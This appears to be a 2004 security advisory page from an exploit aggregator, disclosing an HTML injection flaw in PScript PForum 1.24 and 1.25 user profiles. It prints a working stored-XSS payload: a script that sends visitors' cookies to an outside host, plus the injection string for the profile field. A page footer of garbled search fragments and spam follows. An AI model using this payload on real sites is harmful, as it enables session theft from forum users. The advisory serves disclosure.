exploits , vulnerabilities , articles , PScript PForum User Profile HTML Injection Vulnerability

Title	PScript PForum User Profile HTML Injection Vulnerability
Published	2004-08-16-12:00AM
Updated	2004-08-16-08:22PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this vulnerability is credited to Christoph Jeschke <ponders.bugtraq@arcor.de>.
Vulnerable	PScript PForum 1.25 PScript PForum 1.24
Not Vulnerable	PScript PForum 1.26
Code	There is no exploit required. The following example is available: Create a Javascript file and save it as bad.js (your domain name is in this case example.com). The file contains the following code: // bad.js function b() { location.href='example.org/compute_stolen_data.ext?'+document.cookie; } Edit your profile and enter the following line into the IRC Server or AIM ID Input Box. The string have to be shorter then 100 characters. // Input Box (without line break) "><script src=http://example.com/bad.js></script> <img height=0 width=0 src=foo onerror=b(); >
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 00:01:59 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
php-nuke 2 auction news for c scary maze www.579151 news for c vulnerabil SHAKEELASE wwwsex@com www.yoetub www.gzhwgg nantharase www.chengs www.taobao www.89com Bsafe pass eVe Www.feesex www.5151c. www.89six. Www.sex.nu ability ma Daonlud se Download m Gadis smu Pinkwold.h westcoastp news for c tarzanx Apache 2.0 Www.Shakil ericsson ijuhe.webz video stri news for c modern bil vidiosex pidhat e p www98sex.c Agus MySQL 4.1. Sexanaksma /search/ex SEXY HOT G Squid web Windows XP lo435l Crack Data ngentot sa www.bedehi